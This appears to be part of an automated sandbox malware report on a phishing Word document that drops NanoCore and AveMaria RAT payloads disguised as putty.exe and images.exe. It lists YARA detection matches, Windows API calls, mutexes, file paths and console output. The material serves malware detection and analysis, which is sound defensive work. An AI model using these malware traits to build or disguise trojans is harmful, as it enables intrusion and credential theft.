        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: putty[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: images.exe.13.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty[1].exe.0.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: putty.exe.3.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: putty.exe.6.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: images.exe.13.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005708A2 AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0057086B AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
        Source: C:\ProgramData\images.exeCode function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$W PO1100372954 -.docJump to behavior
        Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6a1c2465-7ac5-4f1d-acc5-ef04fcf454c9}
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCDE9.tmpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........)...............................).....`I+........v.....................K2.....................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....(.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............\..j....0.l.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....p...............................}..v............0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.5.............}..v............0.................l.....$.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....................................}..v....8.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............\..j....0.l.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....................................}..v....8.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............\..j....0.l.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....................................}..v....8.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.p.u.t.t.y...e.x.e.'.........l.....J.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j....................................}..v....p.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............\..j....0.l.............................}..v....8.......0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....................................}..v....p.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....."......0.................l.....&.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j....@#..............................}..v.....#......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j....0.l.............................}..v.....*......0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....@+..............................}..v.....+......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................l.....<.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....0..............................}..v....81......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......\..j....0.l.............................}..v.....4......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....5..............................}..v.....6......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.........).............p.................).....`I+........v.....................K2.....................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................].j....................................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...H.......0.................m.....6.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................].j....................................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}..v............0.................m.....".......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................].j....H...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............^].j....@"m.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................].j....H...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............^].j....@"m.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................].j....H...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.p.u.t.t.y...e.x.e.'.........m.....J.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................].j....................................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............^].j....@"m.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................].j....x...............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w...............^].j....@"m.............................}..v....0.......0.......................f.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................].j....................................}..v....h.......0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......^].j....@"m.............................}..v............0.................m.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................].j....................................}..v....0.......0.................m.............................
        Source: C:\Windows\SysWOW64\reg.exeConsole Write: ......................*.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.]...........!.....H.................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.]...........!.............x.........4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.].................~.......x.........4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.]...........!.......................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................._.....................(.P.....................................................6.0.1.]...........!.......................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................._.............C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........................6.0.1.]...........!.....(.......x.........4.....
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: images.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: images.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: images.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: images.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
